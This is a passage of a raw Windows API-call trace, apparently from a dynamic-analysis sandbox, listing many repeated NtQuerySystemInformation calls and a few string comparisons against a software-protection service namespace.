SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0274.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0274.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x28, ResultLength=0x0) [0274.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x28, ResultLength=0x0) [0274.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x20, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x20, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x28, ResultLength=0x0) [0274.367] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x28, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x28, ResultLength=0x0) [0274.376] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x28, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0274.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0274.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x28, ResultLength=0x0) [0274.386] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x28, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0274.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x28, ResultLength=0x0) [0274.394] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0274.394] NtQuerySystemInformation 